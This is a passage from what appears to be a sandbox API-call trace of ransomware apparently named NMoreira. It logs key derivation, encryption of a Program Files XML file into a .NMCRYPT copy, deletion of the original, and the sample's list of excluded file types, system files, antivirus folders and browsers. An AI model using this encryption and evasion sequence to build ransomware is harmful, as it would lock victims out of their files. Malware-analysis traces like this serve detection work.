hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.663] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.663] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0156.663] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0156.663] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad878) returned 1 [0156.663] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0156.663] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0156.663] wcslen (_String="\\\\?\\") returned 0x4 [0156.663] CryptDuplicateKey (in: hKey=0x9ad878, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad4f8) returned 1 [0156.663] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0156.664] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0156.664] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=3333) returned 1 [0156.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0156.665] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.835] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.835] GetLastError () returned 0x0 [0156.835] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.844] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.844] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.844] GetLastError () returned 0x0 [0156.844] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.844] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.844] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.844] GetLastError () returned 0x0 [0156.845] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.845] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.845] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.845] GetLastError () returned 0x0 [0156.845] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.845] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.845] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.845] GetLastError () returned 0x0 [0156.845] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.845] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.845] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.845] GetLastError () returned 0x0 [0156.845] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.845] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.845] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.845] GetLastError () returned 0x0 [0156.845] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.845] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.845] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.845] GetLastError () returned 0x0 [0156.845] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.845] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.845] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.845] GetLastError () returned 0x0 [0156.845] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.845] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.846] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.846] GetLastError () returned 0x0 [0156.846] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.846] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.846] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.846] GetLastError () returned 0x0 [0156.846] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.846] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.846] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.846] GetLastError () returned 0x0 [0156.846] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.846] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.846] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.846] GetLastError () returned 0x0 [0156.846] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.846] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x5, lpOverlapped=0x0) returned 1 [0156.846] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x5, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x10) returned 1 [0156.846] GetLastError () returned 0x0 [0156.846] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x10, lpOverlapped=0x0) returned 1 [0156.846] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0156.846] WriteFile (in: hFile=0x588, lpBuffer=0x607d50*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0156.846] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml")) returned 0x20 [0156.847] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml", dwFileAttributes=0x20) returned 0 [0156.847] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 1 [0156.847] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml")) returned 0 [0156.847] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" [0156.847] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 1 [0156.847] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD7E3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd7e3.tmp")) returned 0xd7e3 [0156.848] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD7E3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd7e3.tmp"), dwFlags=0x1) returned 0 [0156.848] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD7E3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd7e3.tmp")) returned 1 [0156.848] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0156.848] wcslen (_String="OK") returned 0x2 [0156.848] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.848] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.848] CryptDestroyKey (hKey=0x9ad878) returned 1 [0156.848] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0156.848] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0156.848] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0156.848] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*NMCRYPT") returned 0 [0156.848] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*Recovers your files.html") returned 0 [0156.848] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*.exe") returned 0 [0156.848] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*.dll") returned 0 [0156.848] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*.lnk") returned 0 [0156.848] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*.bat") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*.ini") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*.msi") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*.scf") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*pagefile.sys*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*NTUSER.DAT*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*AppData*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*\\winrar\\*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*\\java\\*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*\\windows\\*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*\\ESET\\*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*\\AVG\\*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*\\AVIRA\\*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*Atheros*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*Realtek*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*bootmgr*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*boot*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*boot*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*CONFIG.SYS*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*IO.SYS*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*MSDOS.SYS*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*NTDETECT.COM*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*ntldr*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*chrome*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*opera*") returned 0 [0156.849] PathMatchSpecW (pszFile="baseAltGr_rtl.xml", pszSpec="*firefox*") returned 0 [0156.849] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", pszSpec="*") returned 1 [0156.849] strlen (_Str="NMoreira") returned 0x8 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 